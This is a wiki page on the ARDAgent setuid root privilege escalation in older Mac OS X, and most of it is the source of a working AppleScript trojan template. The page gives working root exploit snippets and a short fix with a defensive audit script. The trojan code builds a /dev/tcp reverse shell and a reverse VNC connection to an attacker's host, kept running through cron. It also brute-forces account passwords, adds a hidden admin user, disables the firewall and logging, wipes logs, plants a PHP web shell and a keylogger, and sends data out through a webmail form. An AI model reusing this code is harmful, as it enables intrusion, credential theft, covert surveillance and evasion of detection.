ARDAgent exploit

From MacShadows KB

The ARDAgent exploit is a root privilege escalation exploit using AppleScript. It takes advantage of lax permissions set on the ARDAgent executable, which is installed with Mac OS X 10.3 (when the Apple Remote Desktop client has been installed) through Mac OS X 10.5 (both OS X 10.4 and 10.5 include the Apple Remote Desktop client). The ARDAgent vulnerability is currently not patched. Apple Remote Desktop need not be active, nor ever have been active, for the exploit to succeed: when ARDAgent is told to 'do shell script' it is launched even if it was not already running. The ARDAgent executable is owned by the root user account and is setuid, meaning that it is possible for the ARDAgent process to be owned by root when launched. This is clearly not the intended behavior, as it is generally launched as a process owned by the current user. The 'do shell script' command, when passed to ARDAgent, will not always succeed, nor will it always be run with root privileges; however, repeating the command eventually results in a successful exploit of the vulnerability.

Discovery

Initial posting by callmenames

The discovery of this exploit is credited to members of TheSharedForums. Following its initial posting and confirmation in the thread, several members including lokin, callmenames, Oktane, andrewistheshit, and Wawl began a collaborative effort to create proof of concept software exploiting this vulnerability, one of which was the AppleScript Trojan Horse Template, a.k.a. "AppleScript.tht" or AS.tht as dubbed by security profiteers.

Usage

AppleScript

--This is a comment, comments begin with two consecutive hyphens
--The next part below is a handler a.k.a. a subroutine
on ARDAgentize(command)
	try
		--Self explanatory?
		tell application "ARDAgent" to do shell script command
	on error
		--Kill ARDAgent if its already running as the user
		do shell script "kill $( ps -xcu ${USER} | grep ARDAgent | awk '{ print $2 }' ) ; exit 0"
		--restart this handler
		ARDAgentize(command)
	end try
end ARDAgentize

--This statement runs the handler and passes it the shell command "id"
ARDAgentize("id")

Bash script (Bourne Again Shell): just paste this next line into Terminal, then click back in the Terminal window and press Return.

function ARDA() { osascript -e 'tell app "ARDAgent" to do shell script "id"' || (kill $(ps -xcu ${USER} | grep ARDAgent | awk '{ print $2 }') ; ARDA ); } ; ARDA

Sample output of either the AppleScript or the shell command line:
"uid=0(root) gid=501(angel) egid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)"

The root account which has user ID zero (uid 0) generally has unrestricted access to processes, commands and files.

Solutions

Don't download and run software from untrusted sources and keep in mind that even software from trusted sources can accidentally destroy your data. Back up your data regularly, ideally to media which are not kept connected to the system and are read-only.

For the ARDAgent vulnerability itself, remove the setuid bit from the executable's permissions.

Shell command:

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

You will be prompted for a password. This change will be undone by repairing permissions with Disk Utility or diskutil from the command line.
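Two checks a defender would script from this section, added here as example code (not from the original page or its forum members): a POSIX shell audit that reports whether the ARDAgent binary above still carries the setuid bit and clears it, verifying the result, plus a crontab scan for the hidden /Users/Shared/.Rshell and /Users/Shared/.Rvnc entries that the trojan template further down installs. Function names and the sample crontab text are my own constructions.

```shell
#!/bin/sh
# Added defensive audit script (not from the original page). Function names
# and the sample crontab text are constructed for this example.

# Path from the page's Solutions section.
ARDAGENT_PATH="/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"

# is_setuid PATH
# Returns 0 when PATH is a regular file with the setuid bit (mode 4000) set,
# 1 when the bit is clear, 2 when the file does not exist. POSIX find is used
# so the test behaves the same with BSD find on macOS and GNU find elsewhere.
is_setuid() {
    [ -f "$1" ] || return 2
    [ -n "$(find "$1" -perm -4000 2>/dev/null)" ]
}

# clear_setuid PATH
# Applies the page's remediation (chmod u-s) and verifies the bit is really
# gone. Must run as the file owner or as root (sudo for the real ARDAgent).
clear_setuid() {
    chmod u-s "$1" 2>/dev/null || return 1
    if is_setuid "$1"; then
        return 1
    fi
    return 0
}

# audit_ardagent [PATH]
# Prints a one-line verdict. Returns 0 when the binary is absent or not
# setuid, 1 when the setuid bit is still present (the exploitable state).
audit_ardagent() {
    path="${1:-$ARDAGENT_PATH}"
    if [ ! -f "$path" ]; then
        echo "absent: $path (Apple Remote Desktop client not installed)"
        return 0
    fi
    if is_setuid "$path"; then
        echo "VULNERABLE: setuid bit set on root-owned $path"
        return 1
    fi
    echo "ok: setuid bit clear on $path"
    return 0
}

# scan_crontab TEXT
# Prints every crontab line that invokes one of the hidden files the trojan
# template on this page drops into /Users/Shared. Returns grep's status:
# 0 when at least one such line was found, 1 when none was.
# Feed it `crontab -l` output for each account on the machine.
scan_crontab() {
    printf '%s\n' "$1" | grep -E '/Users/Shared/\.(Rshell|Rvnc|OSXvnc-server)'
}

# Sample crontab text, constructed for this example: one benign entry and one
# entry of the form the template's reverse_shell handler installs.
SAMPLE_CRONTAB='0	3	*	*	*	/usr/bin/periodic daily
5	*/1	*	*	*	/bin/bash /Users/Shared/.Rshell 2>/dev/null'

# Run the live audit only when invoked as `sh audit.sh --audit`, so that
# sourcing the file for its functions has no side effects.
if [ "${1:-}" = "--audit" ]; then
    audit_ardagent
    echo "crontab entries pointing at hidden /Users/Shared files:"
    scan_crontab "$(crontab -l 2>/dev/null)" || echo "  none"
fi
```

The crontab scan only sees the invoking user's crontab; checking every account needs root to run crontab -u for each user.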

AppleScript Trojan Horse Template

The script source is shown below.

---------------------------------------------------------------------------
--AppleScript trojan horse template (incomplete, still in progress v0.6 posted)
---------------------------------------------------------------------------
--Written & tested with AppleScript 1.10.7 on Mac OS X 10.4.11 PPC


---------------------------------------------------------------------------
--Variables
--------------------
global masters_email_address, padlock_icon, software_update_icon, be_quiet, OSX_hashes, OSX_version_number_major, OSX_version_number_minor, OSX_version_number_mini, i_am_an_admin, i_have_root_access, my_username, my_password, my_Path, my_POSIX_folder, my_folder, my_name, launch_path, SystemLoginItems, hidden_admin_username, hidden_admin_password, hidden_admin_password_hash, ip_addresses, move_myself, my_resources, all_else_fails, phpshell_path, candidates_file, target_DDNS_username, target_DDNS_password, target_DDNS_id, target_DDNS_update_URL, masters_DDNS_address, accounts_file, debug, masters_netcat_port, masters_VNC_port, hashes_file, secret_file, key1, key2, webmail_command_line, the_message, the_title, webmail_success_response_term

--###############################################--
--########### HEY! You might want to change these? ###########--
--###############################################--
--These are the tr keys for fuxor and defuxor
set key1 to do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""

--The secret file filename
set secret_file to ".howdy"
set the_title to "Howdy"

--The following variables WILL be changed to the values found in the plist file if the plist file exists
--Which means if you change them within this script, delete the plist file
--If you use the plist file, don't bother changing the value in this script
--debug, hidden_admin_password, hidden_admin_username, masters_DDNS_address, masters_email_address, masters_netcat_port, masters_VNC_port, target_DDNS_id, target_DDNS_password, target_DDNS_update_URL, target_DDNS_username, webmail_command_line, webmail_success_response_term

set debug to true

--The name and password to use with the hidden admin account to be created
set hidden_admin_password to "a secret"
set hidden_admin_username to "nobodyd"

--For the reverse_shell
--Enter *your* Dynamic DNS address for the reverse-shell to connect to you
--Don't forget to update your DDNS record with your current IP if your IP is not static
set masters_DDNS_address to "localhost"

--Your email address for the outgoing mail to you
set masters_email_address to "emailname%40emaildomain.com"

--Whether or not to relocate the trojan away from where it was run
set move_myself to true

--Port number for connect-backs, reverse-shell etc.
set masters_netcat_port to "6880"
set masters_VNC_port to "6879"

--For the target's / victim's Dynamic DNS address so that you can get their IP address even if the outgoing email fails
set target_DDNS_id to "DDNS id"
set target_DDNS_password to "DDNS password"
set target_DDNS_username to "" --Leave this blank if you aren't using a DDNS service to track the target computer.
--You may need to adjust this for different DDNS service providers
set target_DDNS_update_URL to "http://www.sitelutions.com/dnsup?user=" & target_DDNS_username & "&pass=" & target_DDNS_password & "&id=" & target_DDNS_id & "&detectip=1"

set webmail_command_line to "curl -d 'hdnSendMail=sendNow&To=<<MASTERS_EMAIL_ADDRESS>>&CC=&BCC=&Subject=<<THE_TITLE>>&Message=<<THE_MESSAGE>>&btnSend=Send' www.employeesuggestions.com/form.asp 2>/dev/null | grep  '<<SUCCESS_RESPONSE_TERM>>'"
set webmail_success_response_term to "Your anonymous suggestion has been sent"

--###############################################--
--###### end of the 'HEY! You might want to change these?' stuff ######--
--###############################################--

--You probably shouldn't change these.
set padlock_icon to 2
set software_update_icon to 0
set be_quiet to true
set OSX_hashes to ""
set OSX_version_number_major to do shell script "sw_vers -productVersion | cut -d '.' -f 1"
set OSX_version_number_minor to do shell script "sw_vers -productVersion | cut -d '.' -f 2"
set OSX_version_number_mini to do shell script "sw_vers -productVersion | cut -d '.' -f 3"
set SystemLoginItems to ""
set i_am_an_admin to false
set i_have_root_access to false
set my_username to system attribute "USER"
set my_password to ""
set ip_addresses to ""
set my_Path to POSIX path of (path to me)
set my_POSIX_folder to (do shell script "dirname " & quoted form of my_Path) & "/"
set my_folder to (POSIX file my_POSIX_folder) --unused at present
set my_name to do shell script "basename \"" & my_Path & "\""
copy my_Path to launch_path
set my_resources to my_Path & "Contents/Resources/"
set phpshell_path to my_Path & "Contents/Resources/phpshell-2.1/"
set candidates_file to "/Users/Shared/SC Info/.candidates"
set accounts_file to "/Users/Shared/SC Info/.accounts"
set hashes_file to "/Users/Shared/SC Info/.hashes"
set all_else_fails to false

--Get the padlock icon
try
    --You could place a copy of the icns file(s) within your application bundle, then change this path.
    --Note that it will not work from Script Editor and will work from your finished app.
    set padlock_icon to POSIX file ("/System/Library/CoreServices/SecurityAgent.app/Contents/Resources/Security.icns" as text)
end try

--Get the Software Update icon
try
    set software_update_icon to POSIX file ("/System/Library/CoreServices/Software Update.app/Contents/Resources/Software Update.icns" as text)
end try


---------------------------------------------------------------------------
--Handlers
--------------------
on read_my_plist()
    --If my plist file exists, read settings from my plist file and use those instead of settings previously set in this script
    --If anyone knows of a method for indirect variable assignment in AppleScript, let me know! :)
    local tempvar
    if debug then log_event("read_my_plist")
    if (do shell script "[ -f " & quoted form of my_resources & "com.AStht.config.plist ] && echo 'true' || echo 'false'" as text) is "true" then
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config debug"
        if tempvar is "0" then set debug to false
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config hidden_admin_password"
        if tempvar is not "" then set hidden_admin_password to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config hidden_admin_username"
        if tempvar is not "" then set hidden_admin_username to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_DDNS_address"
        if tempvar is not "" then set masters_DDNS_address to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_email_address"
        if tempvar is not "" then set masters_email_address to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_netcat_port"
        if tempvar is not "" then set masters_netcat_port to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_VNC_port"
        if tempvar is not "" then set masters_VNC_port to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_id"
        if tempvar is not "" then set target_DDNS_id to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_password"
        if tempvar is not "" then set target_DDNS_password to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_update_URL"
        if tempvar is not "" then set target_DDNS_update_URL to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_username"
        if tempvar is not "" then set target_DDNS_username to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config webmail_success_response_term"
        if tempvar is not "" then set webmail_success_response_term to tempvar
        
        set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config webmail_command_line"
        
        if tempvar is not "" then set webmail_command_line to tempvar
        else
        if debug then log_event("read_my_plist: plist not found")
    end if
end read_my_plist


on i_have_a_secret()
    --This routine gathers, sorts and uniques data from the various hidden files and creates a new secret_file,
    --then copies it to several locations which may be easily accessible.
    if debug then log_event("i_have_a_secret")
    try
        do shell script "cat " & quoted form of secret_file & " " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " | tr '\\r' '\\n' | sort -u > /var/tmp/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "[ -f /var/tmp/" & quoted form of secret_file & "] && mv /var/tmp/" & quoted form of secret_file & " ~/Public/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " ~/Sites/images/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "chmod 777 ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " ~/Sites/images/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
        do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
    end try
end i_have_a_secret

on log_event(append_this)
    local append_this
    do shell script ("echo \"$(date '+%y/%m/%d %H:%M:%S'), OS:" & OSX_version_number_major & "." & OSX_version_number_minor & "." & OSX_version_number_mini & ", AS:" & (version of AppleScript as text) & ", " & my_Path & " V:0.5 -- " & append_this & "\" >> /Users/Shared/.AStht.log")
end log_event


on Back_to_masters_VNC()
    if debug then log_event("back_to_masters_VNC")
    local Rvnc, the_process, crontent
    try
        do shell script "test -x /Users/Shared/.OSXvnc-server || cp \"" & my_resources & "Vine Server.app/Contents/Resources/OSXvnc-server\" /Users/Shared/.OSXvnc-server"
    end try
    set Rvnc to "#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
if [ -z \"$( lsof -i:" & masters_VNC_port & " | grep ESTABLISHED | grep OSXvnc )\" ]
then
    the_process=$( ps -auxwww | grep -i OSXvnc-server | grep -v grep | tr -s ' ' | cut -d ' ' -f 2 )
    [ \"x${the_process}\" != \"x\" ] && kill -9 \"${the_process}\"
fi
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec /Users/Shared/.OSXvnc-server -connectHost ${address} -connectPort " & masters_VNC_port & " &
exit 0"
    --Output the shell script to handle the OSXvnc-server reverse connection
    do shell script "echo " & quoted form of Rvnc & " > /Users/Shared/.Rvnc; chmod 777 /Users/Shared/.Rvnc"
    --Set a crontask to run the script every hour at 15 minutes past the hour
    set crontent to ((do shell script "crontab -l 2>/dev/null; exit 0") & return & "15" & tab & "*/1" & tab & "*" & tab & "*" & tab & "*" & tab & "/bin/bash /Users/Shared/.Rvnc 2>/dev/null")
    set crontent to do shell script "echo '" & crontent & "' | tr '\\r' '\\n' | sort -rnu > /var/tmp/cronappend"
    do shell script "crontab /var/tmp/cronappend"
    do shell script "rm /var/tmp/cronappend"
end Back_to_masters_VNC

on brute_user_accounts()
    --Attempt to brute-force passwords for the user accounts on this computer. This is not too speedy but if everything is else is done, I have nothing but time.
    if debug then log_event("brute_user_accounts")
    local the_users, the_passwords, the_username, the_password
    set the_users to {do shell script "dscl . -list /Users | while read username; do passwd=$( dscl . -read /Users/${username} passwd | cut -d ' ' -f 2 ); [ \"${passwd}\" != '*' ] && echo ${username}; done; exit 0"}
    set the_passwords to {"password" & return & "admin" & return & "1234" & return}
    try
        set the_passwords to {the_passwords & (do shell script "cat " & quoted form of candidates_file & " 2>/dev/null; exit 0")}
    end try
    set the_passwords to {do shell script "echo '" & the_passwords & return & the_users & return & return & "' | tr '\\r' '\\n' | sort -u "}
    repeat with the_username in the_users
        repeat with the_password in the_passwords
            try
                do shell script "expect -c 'spawn su " & the_username & "' -c 'expect Password: {send " & the_password & "\\n}' -c 'send id\\n' -c 'send exit\\n' -c 'expect eof' | grep uid"
                do shell script "echo " & the_username & ":" & the_password & " >> " & quoted form of accounts_file
                exit repeat
            end try
        end repeat
    end repeat
end brute_user_accounts

on reverse_shell()
    if debug then log_event("reverse_shell")
    local Rshell, the_process, crontent
    set Rshell to "#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec 6<>/dev/tcp/${address}/" & masters_netcat_port & " || exit 0
id >&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
cat <&6 | while read input
do
    $input >&6 2>&6
    echo -n \"${USER}@${HOSTNAME} > \" >&6
done
exit 0"
    --Output the shell script to handle the bash reverse-shell
    do shell script "echo " & quoted form of Rshell & " > /Users/Shared/.Rshell; chmod 777 /Users/Shared/.Rshell"
    --Set a crontask to run the script every hour at 5 minutes past the hour
    set crontent to ((do shell script "crontab -l 2>/dev/null; exit 0") & return & "5" & tab & "*/1" & tab & "*" & tab & "*" & tab & "*" & tab & "/bin/bash /Users/Shared/.Rshell 2>/dev/null")
    set crontent to do shell script "echo '" & crontent & "' | tr '\\r' '\\n' | sort -rnu > /var/tmp/cronappend"
    do shell script "crontab /var/tmp/cronappend"
    do shell script "rm /var/tmp/cronappend"
end reverse_shell

on its_smoky_in_here_lets_open_ports_in_the_firewall()
    --This handler is best run by root (but may disable the firewall in the preference file with only admin access, firewall won't be off until restart.)
    if debug then log_event("its_smoky_in_here_lets_open_ports_in_the_firewall")
    --A member of the admin group may already have write access to the file without the use of sudo. Try this first.
    try
        do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall state -bool false"
        do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall loggingenabled -int 0"
        do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall stealthenabled -int 0"
        do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall udpenabled -int 0"
    end try
    if i_have_root_access then
        try
            --for ipfw
            do shell script "/usr/bin/sudo /sbin/ipfw disable firewall" --stop ipfw if it is running
        end try
        --Modify the plist files to disable the firewall on startup
        --admin access is required, sudo actually isn't but I'll need it if I'm not an admin
        try
            --FirewallTool complains (in 10.4 at least) if the next four items aren't these exact types
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall state -bool false"
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall loggingenabled -int 0"
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall stealthenabled -int 0"
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall udpenabled -int 0"
            --for Leopard 10.5, won't hurt anything on prior systems
            do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 0"
        end try
    end if
end its_smoky_in_here_lets_open_ports_in_the_firewall

on throw_another_log_on_the_fire()
    if debug then log_event("throw_another_log_on_the_fire")
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --Call nothing_to_see_here to stop logging first.
    --Then this handler to clean the logs...
    try
        --Just delete utmp and wtmp for now, still need to write a cleaning routine
        do shell script "/usr/bin/sudo rm /var/run/utmp /var/run/utmpx /var/log/wtmp /var/log/wtmpx 2>/dev/null"
    end try
    try
        do shell script "exec /usr/bin/sudo bash <<< 'for log in /var/log/system.log /var/log/secure.log /var/log/ftp.log /var/log/asl.log /var/log/httpd/access_log /var/log/httpd/error_log /var/log/lastlog /Library/Logs/AppleFileService/AppleFileService*.log /Library/Logs/Console/*/console.log; do [ -f ${log} ] && { sed -e \"/[Ff][Rr][Oo][Mm]/d\" -e \"/client/d\" -e \"/[Ll]og[Kk]ext/d\" -e \"/" & my_username & "/d\" ${log} > ${log}.tmp && mv ${log}.tmp ${log}; }; done' "
    end try
end throw_another_log_on_the_fire

on nothing_to_see_here()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("nothing_to_see_here")
    try
        --Disable logging
        if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
            --For Tiger & Leopard
            do shell script "/usr/bin/sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.syslogd.plist"
        else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then
            --For Panther and Jaguar
            do shell script "/usr/bin/sudo killall syslogd"
        else
            --for Puma and Cheetah
            do shell script "myoutput=`/bin/ps -axww | grep syslogd | grep -v grep | sed -e 's/^ *//' -e 's/ .*//'`; [ -n \"${myoutput}\" ] && /usr/bin/sudo kill \"${myoutput}\""
        end if
    end try
    try
        --Stop system accounting
        do shell script "/usr/bin/sudo /usr/sbin/accton"
        do shell script "/usr/bin/sudo rm /var/account/acct"
    end try
    try
        --Change syslog.conf
        do shell script "/usr/bin/sudo mv /etc/syslog.conf /etc/syslog.conf.AStht; /usr/bin/sudo sed -e 's_/var/log/secure.log_/dev/null_' -e 's_/var/log/ftp.log_/dev/null_' /etc/syslog.conf.AStht > /var/tmp/syslog.conf && /usr/bin/sudo mv -f /var/tmp/syslog.conf /etc/syslog.conf && /usr/bin/sudo touch -r /etc/syslog.conf.AStht /etc/syslog.conf 2>/dev/null"
    end try
    try
        --Change logging settings in /Library/Preferences/com.apple.AppleFileServer.plist
        do shell script "exec /usr/bin/sudo bash <<< 'cp /Library/Preferences/com.apple.AppleFileServer.plist /Library/Preferences/com.apple.AppleFileServer.plist.AStht; defaults write /Library/Preferences/com.apple.AppleFileServer activityLog -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer activityLogPath -string /dev/null; defaults write /Library/Preferences/com.apple.AppleFileServer errorLogPath -string /dev/null; defaults write /Library/Preferences/com.apple.AppleFileServer admin31GetsSp -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer adminGetsSp -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer allowRootLogin -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer specialAdminPrivs -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer autoRestart -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer loggingAttributes \"<dict><key>logCreateDir</key><false/><key>logCreateFile</key><false/><key>logDelete</key><false/><key>logLogin</key><false/><key>logLogout</key><false/><key>logOpenFork</key><false/></dict>\"'"
    end try
end nothing_to_see_here

on install_phpshell()
    --This handler is best run by root (but can install to a user home folder without admin or root.)
    --PHPshell version 2.1 http://sourceforge.net/projects/phpshell
    if debug then log_event("install_phpshell")
    if OSX_version_number_minor as number ≥ 1 then
        --OS X 10.0 did not include PHP
        if i_have_root_access then
            --Place the PHPshell folder (unzipped) inside the Resources folder within your script bundle (or inside Script Editor if you aren't saving as an app)
            --Hopefully you remembered to add a user such as any of the following to PHPshell's config.php?
            --nobodyd  = "md5:54889c9:45caff28b8f9340ccb43f9f61d72b2a3"
            --nobodyd  = "sha1:527faf43:8a60cb4d7d16b6df77ebf01bcd6a8c98c6ab10d9"
            --nobodyd  = "a secret"
            try
                --Check if the file /Library/WebServer/Documents/.PS_Store/phpshell.php is already there
                --and if not, copy the contents of the PHPShell directory from within my application bundle
                --into /Library/WebServer/Documents/.PS_Store/
                do shell script "test -f /Library/WebServer/Documents/.PS_Store/phpshell.php || /usr/bin/sudo mkdir -p -m 777 /Library/WebServer/Documents/; /usr/bin/sudo cp -R " & quoted form of phpshell_path & " /Library/WebServer/Documents/.PS_Store/"
            end try
            try
                --Enable PHP4 support in /etc/httpd/httpd.conf
                do shell script "/usr/bin/sudo mv -f /etc/httpd/httpd.conf /etc/httpd/httpd.conf.AStht; /usr/bin/sudo sed -e 'sO# *LoadModule php4_module *libexec/httpd/libphp4.soOLoadModule php4_module libexec/httpd/libphp4.soO' -e 'sO# *AddType application/x-httpd-php .phpOAddType application/x-httpd-php .phpO' -e 'sO# *AddType application/x-httpd-php-source .phpsOAddType application/x-httpd-php-source .phpsO' -e 'sO# *AddModule mod_php4.cOAddModule mod_php4.cO' /etc/httpd/httpd.conf.AStht > /var/tmp/httpd.conf && /usr/bin/sudo mv -f /var/tmp/httpd.conf /etc/httpd/httpd.conf && /usr/bin/sudo touch -r /var/tmp/httpd.conf /etc/httpd/httpd.conf 2>/dev/null"
            end try
        else
            --If I don't have root access then I'll install PHPShell into /Library/WebServer/Documents, try ~/Sites
            do shell script "test -d ~/Sites/ && { test -f ~/Sites/images/.PS_Store/phpshell.php || mkdir -p ~/Sites/images 2>/dev/null && cp -R " & quoted form of phpshell_path & " ~/Sites/images/.PS_Store/; chgrp -Rf admin ~/Sites/; }"
        end if
    end if
    --You might also want to call enable_webserver()
end install_phpshell

on enable_webserver()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --This enables "Personal Web Sharing" and opens the web sharing ports in the firewall under Mac OS X 10.4 Tiger
    if debug then log_event("enable_webserver")
    try
        --Set "WEBSERVER=-YES-" in /etc/hostconfig
        do shell script "/usr/bin/sudo mv -f /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo sed -e 's/WEBSERVER=-NO-/WEBSERVER=-YES-/' /etc/hostconfig.AStht > /var/tmp/hostconfig && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
    end try
    try
        --Check /etc/hostconfig one more time and if "WEBSERVER=-YES-" isn't there, just append it.
        do shell script "grep 'WEBSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'WEBSERVER=-YES-' >> /etc/hostconfig  && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
    end try
    try
        do shell script "/usr/bin/sudo  launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist"
    on error
        do shell script "/usr/bin/sudo apachectl restart 2>/dev/null; exit 0"
    end try
    --/System/Library/LaunchDaemons org.apache.httpd.plist for leopard -- includes "SHAuthorizationRight" ?
end enable_webserver

on enable_Personal_File_Sharing()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    if debug then log_event("enable_Personal_File_Sharing")
    try
        --Set "AFPSERVER=-YES-" in /etc/hostconfig
        do shell script "/usr/bin/sudo mv -f /etc/hostconfig /etc/hostconfig.AStht2 && /usr/bin/sudo sed -e 's/AFPSERVER=-NO-/AFPSERVER=-YES-/' /etc/hostconfig.AStht2 > /var/tmp/hostconfig && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht2 /etc/hostconfig 2>/dev/null"
    end try
    try
        --Check /etc/hostconfig one more time and if "AFPSERVER=-YES-" isn't there, just append it.
        do shell script "grep 'AFPSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'AFPSERVER=-YES-' >> /etc/hostconfig  && /usr/bin/sudo touch -r /etc/hostconfig.AStht2 /etc/hostconfig 2>/dev/null"
    end try
    try
        do shell script "/usr/bin/sudo  launchctl load -w /System/Library/LaunchDaemons/com.apple.AppleFileServer.plist"
    on error
        do shell script "/usr/bin/sudo  /usr/sbin/AppleFileServer 2>/dev/null; exit 0"
    end try
end enable_Personal_File_Sharing

on install_and_activate_logKext()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --logKext version 2.2 http://logkext.googlecode.com/files/logKext.pkg.zip
    --This version of logKext is only for 10.4 and 10.5 and it is UB
    if debug then log_event("install_and_activate_logKext")
    if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
        try
            --Place a copy of logKext.pkg (unzipped) inside the Resources folder within your script bundle (or inside Script Editor if you aren't saving as an app)
            do shell script "[ -f /Library/Preferences/com.fsb.logKext ] && exit 0; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkext-1.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkext.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextclient.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextdaemon.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextkeygen.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextkeymap.pkg/\""
        on error error_message number error_number
            if debug then log_event("install_and_activate_logKext:ERROR #" & error_number & " " & error_message)
            --logKext wasn't installed, perhaps the path to the logKext package within my application bundle is incorrect?
        end try
        --Tell Spotlight not to index the files in /Library/Preferences
        do shell script "sudo defaults write /.Spotlight-V100/_exclusions EXCLUSIONS -array-add /Library/Preferences"
    end if
end install_and_activate_logKext

on there_are_no_osx_viruses_silly_wabbit()
    --This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
    --Tested with an older version of NAVLU. Hmm, not sure about file's write permissions...
    if debug then log_event("there_are_no_osx_viruses_silly_wabbit")
    try
